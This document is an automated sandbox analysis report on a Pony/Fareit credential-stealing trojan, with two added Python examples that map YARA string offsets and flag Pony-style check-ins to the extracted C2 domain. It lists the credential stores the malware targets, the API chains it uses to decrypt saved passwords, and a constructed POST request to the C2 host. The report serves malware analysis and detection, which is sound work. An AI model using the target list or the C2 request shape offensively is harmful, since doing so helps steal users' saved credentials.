
Windows Analysis Report
2qsdqACnX3.exe

Overview

General Information

Sample name: 2qsdqACnX3.exe (renamed because the original name is a hash value)
Original sample name: 73339cacdb37937c47ea7668ac3a1017.exe
Analysis ID: 1523193
MD5: 73339cacdb37937c47ea7668ac3a1017
SHA1: b32d273a752ad25173e26a110ae05acbabf3f15d
SHA256: d0abb0bd329f13afadfb0bbf6730f2233488b8c6c6f5e593d61d91b20fe8b772
Tags: exe, Pony, user-abuse_ch

Detection

Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Pony
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Machine Learning detection for sample
Pony trojan / infostealer detected
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 2qsdqACnX3.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\2qsdqACnX3.exe" MD5: 73339CACDB37937C47EA7668AC3A1017)
    • cmd.exe (PID: 940 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malpedia reference
Name: EvilPony, Ponyshe
Description: Privately modded version of the Pony stealer.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Extracted malware configuration: {"C2 list": ["http://gunnylaumienphi2017.com/"]}
Yara matches on the submitted file (source: 2qsdqACnX3.exe, type: SAMPLE)

  Rule: JoeSecurity_Pony | Description: Yara detected Pony | Author: Joe Security
  Rule: Windows_Trojan_Pony_d5516fe8 | Description: unknown | Author: unknown
    • 0x12518:$a1: \Global Downloader
    • 0x11ca1:$a2: wiseftpsrvs.bin
    • 0x12378:$a3: SiteServer %d\SFTP
    • 0x1236c:$a4: %s\Keychain
    • 0x125d6:$a5: Connections.txt
    • 0x1291d:$a6: ftpshell.fsi
    • 0x13078:$a7: inetcomm server passwords
  Rule: pony | Description: Identify Pony | Author: Brian Wallace @botnet_hunter
    • 0x10eb9:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    • 0x130bf:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    • 0x10777:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
    • 0x10d98:$s3: POST %s HTTP/1.0
    • 0x10dc1:$s4: Accept-Encoding: identity, *;q=0
  Rule: Fareit | Description: Fareit Payload | Author: kevoreilly
    • 0x132f9:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
Yara matches in process memory dumps (type: MEMORY)

Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp
  Rule: JoeSecurity_Pony | Description: Yara detected Pony | Author: Joe Security
  Rule: Windows_Trojan_Pony_d5516fe8 | Description: unknown | Author: unknown
    • 0x2518:$a1: \Global Downloader
    • 0x1ca1:$a2: wiseftpsrvs.bin
    • 0x2378:$a3: SiteServer %d\SFTP
    • 0x236c:$a4: %s\Keychain
    • 0x25d6:$a5: Connections.txt
    • 0x291d:$a6: ftpshell.fsi
    • 0x3078:$a7: inetcomm server passwords
  Rule: pony | Description: Identify Pony | Author: Brian Wallace @botnet_hunter
    • 0xeb9:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    • 0x30bf:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    • 0x777:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
    • 0xd98:$s3: POST %s HTTP/1.0
    • 0xdc1:$s4: Accept-Encoding: identity, *;q=0

Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
  Rule: JoeSecurity_Pony | Description: Yara detected Pony | Author: Joe Security
  Rule: Windows_Trojan_Pony_d5516fe8 | Description: unknown | Author: unknown
    • 0x2518:$a1: \Global Downloader
    • 0x1ca1:$a2: wiseftpsrvs.bin
    • 0x2378:$a3: SiteServer %d\SFTP
    • 0x236c:$a4: %s\Keychain
    • 0x25d6:$a5: Connections.txt
    • 0x291d:$a6: ftpshell.fsi
    • 0x3078:$a7: inetcomm server passwords
  (5 further entries are collapsed in the report and not reproduced here)
Yara matches on unpacked PE files (type: UNPACKEDPE)

Source: 0.2.2qsdqACnX3.exe.400000.0.unpack
  Rule: JoeSecurity_Pony | Description: Yara detected Pony | Author: Joe Security
  Rule: Windows_Trojan_Pony_d5516fe8 | Description: unknown | Author: unknown
    • 0x13318:$a1: \Global Downloader
    • 0x12aa1:$a2: wiseftpsrvs.bin
    • 0x13178:$a3: SiteServer %d\SFTP
    • 0x1316c:$a4: %s\Keychain
    • 0x133d6:$a5: Connections.txt
    • 0x1371d:$a6: ftpshell.fsi
    • 0x13e78:$a7: inetcomm server passwords
  Rule: pony | Description: Identify Pony | Author: Brian Wallace @botnet_hunter
    • 0x11cb9:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    • 0x13ebf:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    • 0x11577:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
    • 0x11b98:$s3: POST %s HTTP/1.0
    • 0x11bc1:$s4: Accept-Encoding: identity, *;q=0
  Rule: Fareit | Description: Fareit Payload | Author: kevoreilly
    • 0x140f9:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...

Source: 0.0.2qsdqACnX3.exe.400000.0.unpack
  Rule: JoeSecurity_Pony | Description: Yara detected Pony | Author: Joe Security
  (3 further entries are collapsed in the report and not reproduced here)
            No Sigma rule has matched
            No Suricata rule has matched
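The same twelve Yara strings are reported above at three different offsets depending on the source: the file on disk, the memory region dumped from 0x411000, and the PE rebuilt from the image at 0x400000. The Python below is an added example and not part of the Joe Sandbox report. It takes the offsets exactly as the report lists them and shows how to carry a memory-dump hit back to an offset in the file on disk: the region base and image base come from the dump names, while the single section mapping (file offset 0x10000 mapped at virtual address 0x411000, size 0x4000) is inferred from the offsets themselves and is an assumption, not a parsed section table. It also records that the rebuilt PE's offsets sit a constant 0xE00 past the original file offsets, so those offsets should not be used directly against the sample on disk.

```python
from typing import Optional

IMAGE_BASE = 0x400000        # from the dump name 0.2.2qsdqACnX3.exe.400000.0.unpack
DUMP_REGION_BASE = 0x411000  # from the .sdmp names ...0000000000411000...

# (file offset, offset in the 0x411000 dump, offset in the rebuilt PE) for every
# Yara string of Windows_Trojan_Pony_d5516fe8 and pony, as listed in the report.
HITS = {
    "$a1 \\Global Downloader":        (0x12518, 0x2518, 0x13318),
    "$a2 wiseftpsrvs.bin":           (0x11ca1, 0x1ca1, 0x12aa1),
    "$a3 SiteServer %d\\SFTP":        (0x12378, 0x2378, 0x13178),
    "$a4 %s\\Keychain":               (0x1236c, 0x236c, 0x1316c),
    "$a5 Connections.txt":           (0x125d6, 0x25d6, 0x133d6),
    "$a6 ftpshell.fsi":              (0x1291d, 0x291d, 0x1371d),
    "$a7 inetcomm server passwords": (0x13078, 0x3078, 0x13e78),
    "$s1 GUID format string (1st)":  (0x10eb9, 0xeb9, 0x11cb9),
    "$s1 GUID format string (2nd)":  (0x130bf, 0x30bf, 0x13ebf),
    "$s2 YUIPWDFILE0... header":     (0x10777, 0x777, 0x11577),
    "$s3 POST %s HTTP/1.0":          (0x10d98, 0xd98, 0x11b98),
    "$s4 Accept-Encoding: identity": (0x10dc1, 0xdc1, 0x11bc1),
}

# Section mapping inferred from the hits (assumption: one section covers them all).
# Each entry: (virtual address, raw file offset, size in bytes).
SECTIONS = [
    (0x411000, 0x10000, 0x4000),
]


def dump_offset_to_va(offset: int, region_base: int = DUMP_REGION_BASE) -> int:
    """An offset inside a .sdmp is relative to that region's base address in the process."""
    return region_base + offset


def va_to_file_offset(va: int, sections=SECTIONS) -> Optional[int]:
    """Translate a virtual address to a raw file offset through the section mapping."""
    for sec_va, sec_raw, sec_size in sections:
        if sec_va <= va < sec_va + sec_size:
            return sec_raw + (va - sec_va)
    return None  # address is outside every known section


def reconcile(hits=HITS) -> dict:
    """For every hit, the dump offset (via VA) must land on the reported file offset,
    and the rebuilt-PE offset must sit at one constant distance from the file offset."""
    rebuilt_deltas = set()
    mismatches = []
    for name, (file_off, dump_off, unpack_off) in hits.items():
        if va_to_file_offset(dump_offset_to_va(dump_off)) != file_off:
            mismatches.append(name)
        rebuilt_deltas.add(unpack_off - file_off)
    return {
        "mismatches": mismatches,
        "rebuilt_pe_delta": rebuilt_deltas.pop() if len(rebuilt_deltas) == 1 else None,
        "lowest_va": dump_offset_to_va(min(h[1] for h in hits.values())),
        "highest_va": dump_offset_to_va(max(h[1] for h in hits.values())),
    }


if __name__ == "__main__":
    result = reconcile()
    print("mismatches:", result["mismatches"])
    print("rebuilt PE offset = file offset + 0x%X" % result["rebuilt_pe_delta"])
    print("strings live between VA 0x%X and 0x%X" % (result["lowest_va"], result["highest_va"]))
```

With no mismatches across all twelve strings, the three sources describe one unchanged layout: the indicator strings are already in plaintext in the file on disk and are not produced by an unpacking stage, which is why the pre-execution and post-execution dumps match the same rules as the submitted file.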


            AV Detection

Source: 2qsdqACnX3.exe | Avira: detected
Source: 0.2.2qsdqACnX3.exe.400000.0.unpack | Malware Configuration Extractor: Pony {"C2 list": ["http://gunnylaumienphi2017.com/"]}
Source: 2qsdqACnX3.exe | Virustotal: Detection: 77%
Source: 2qsdqACnX3.exe | ReversingLabs: Detection: 94%
Source: Yara match | File source: 2qsdqACnX3.exe, type: SAMPLE
Source: Yara match | File source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 2qsdqACnX3.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040A2F4 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040CFA0 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040B818 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040A54F CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040A139 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040CA1F lstrlen,CryptUnprotectData,LocalFree
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040A706 lstrlen,CryptUnprotectData,LocalFree
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00403FF9 CryptUnprotectData,LocalFree
Source: 2qsdqACnX3.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00403DC3 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00404E00 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_004086C7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00404A90 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00409414 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00408543 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

            Networking

Source: Malware configuration extractor | URLs: http://gunnylaumienphi2017.com/
Source: 2qsdqACnX3.exe, 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 2qsdqACnX3.exe | String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_*ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/*password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: 2qsdqACnX3.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 2qsdqACnX3.exe | String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: 2qsdqACnX3.exe | String found in binary or memory: http://gunnylaumienphi2017.com/
Source: 2qsdqACnX3.exe | String found in binary or memory: http://gunnylaumienphi2017.com/YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
Source: 2qsdqACnX3.exe | String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
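No Suricata rule matched in this run, so the network indicators the report gives are static: the C2 URL from the extracted configuration and the request template in the pony Yara strings ("POST %s HTTP/1.0" and "Accept-Encoding: identity, *;q=0"). The Python below is an added example and not part of the report. It parses raw HTTP requests and flags a Pony-style check-in either by destination host or by that request shape. The three requests are constructed for the example: the request paths, the Content-Length values and the placeholder body are assumptions, since the report shows only the format strings, and the benign request reuses a host (www.ecosia.org) that appears in the browser-data strings above.

```python
from typing import Optional
from urllib.parse import urlsplit

# C2 URL from the Pony configuration extracted in the report.
PONY_C2_URLS = ["http://gunnylaumienphi2017.com/"]

# Request-shape indicator from the pony Yara rule ($s4); $s3 gives the HTTP/1.0 POST.
PONY_ACCEPT_ENCODING = "identity, *;q=0"


def c2_hosts(urls=PONY_C2_URLS) -> set:
    """Normalize configured C2 URLs to lower-case host names for matching."""
    return {urlsplit(u).hostname.lower() for u in urls}


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP request into method, target, version, a lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def classify_request(raw: bytes) -> Optional[str]:
    """Return the reason a request looks like a Pony check-in, or None for anything else."""
    req = parse_http_request(raw)
    host = req["headers"].get("host", "").split(":")[0].lower()
    if host in c2_hosts():
        return "host matches extracted Pony C2"
    # Pony's report upload is an HTTP/1.0 POST carrying this exact Accept-Encoding value.
    if (req["method"] == "POST" and req["version"] == "HTTP/1.0"
            and req["headers"].get("accept-encoding") == PONY_ACCEPT_ENCODING):
        return "POST with Pony request template (HTTP/1.0, Accept-Encoding: identity, *;q=0)"
    return None


# Constructed requests. The first follows the report's indicators; its body is a
# placeholder, not Pony's real report format.
SAMPLE_C2_POST = (
    b"POST / HTTP/1.0\r\n"
    b"Host: gunnylaumienphi2017.com\r\n"
    b"Accept-Encoding: identity, *;q=0\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b"placeholder"
)
SAMPLE_BENIGN_GET = (
    b"GET /favicon.ico HTTP/1.1\r\n"
    b"Host: www.ecosia.org\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"\r\n"
)
# Same request template sent to a host that is not in the extracted configuration
# (203.0.113.10 is a documentation address, chosen so this runs offline).
SAMPLE_TEMPLATE_ONLY = (
    b"POST / HTTP/1.0\r\n"
    b"Host: 203.0.113.10\r\n"
    b"Accept-Encoding: identity, *;q=0\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for label, raw in [("c2 post", SAMPLE_C2_POST), ("benign get", SAMPLE_BENIGN_GET),
                       ("template only", SAMPLE_TEMPLATE_ONLY)]:
        print(f"{label}: {classify_request(raw)}")
```

The host match is the strong signal; the template match is there for panels that have moved off the configured domain. On its own the Accept-Encoding value is a legitimate header that some clients send, so treat a template-only hit as a lead to be confirmed against destination reputation and the posting process, not as a verdict.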

            E-Banking Fraud

Source: Yara match | File source: 2qsdqACnX3.exe, type: SAMPLE
Source: Yara match | File source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR

            System Summary

Source: 2qsdqACnX3.exe, type: SAMPLE | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: 2qsdqACnX3.exe, type: SAMPLE | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: 2qsdqACnX3.exe, type: SAMPLE | Matched rule: Fareit Payload | Author: kevoreilly
Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Fareit Payload | Author: kevoreilly
Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Fareit Payload | Author: kevoreilly
Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_004104C9
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00402CD2
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: String function: 00403F6E appears 51 times
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: String function: 00401B46 appears 139 times
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: String function: 0041016C appears 42 times
Source: 2qsdqACnX3.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Rule metadata for the matched rules (the metadata is identical for every source; Windows_Trojan_Pony_d5516fe8 and pony matched all six sources listed above, Fareit matched the SAMPLE and the two UNPACKEDPE sources):
  • Windows_Trojan_Pony_d5516fe8: reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
  • pony: date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
  • Fareit: author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: classification engine | Classification label: mal100.troj.spyw.winEXE@5/1@0/0
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040CFA0 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040273D LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00402ABC WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040A457 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_03
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File created: C:\Users\user\AppData\Local\Temp\5990015.bat
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "
Source: 2qsdqACnX3.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File read: C:\Windows\win.ini
